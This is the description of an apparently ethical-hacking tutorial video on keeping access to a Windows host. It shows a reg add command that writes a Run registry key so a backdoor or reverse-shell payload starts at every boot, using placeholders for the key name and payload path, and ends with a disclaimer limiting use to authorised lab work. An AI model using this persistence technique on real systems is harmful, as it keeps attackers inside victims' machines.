How to use the Windows Registry for Persistence w/ Kali Linux
Exploit Academy Exploit Academy
2.86K subscribers
1,673 views
49

 Published On Nov 21, 2022

In this video we look at maintaining access to a windows host by abusing the windows registry to automatically execute a reverse shell back to our kali box. Enjoy!

Commands:

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run \V NAME -d "C:\PAYLOAD" /F

Where "NAME" is the name of the registry key, and "PAYLOAD" is the location that points to your backdoor / payload.


All material provided on this video and this channel is intended for informational/educational purposes only and should not be performed
unless you have permission to do so. These videos are to be performed
within a virtual lab for ethical hacking education only. We are not responsible for any misuse, damages, and or loss of data due to misuse
of this information.

show more

Share/Embed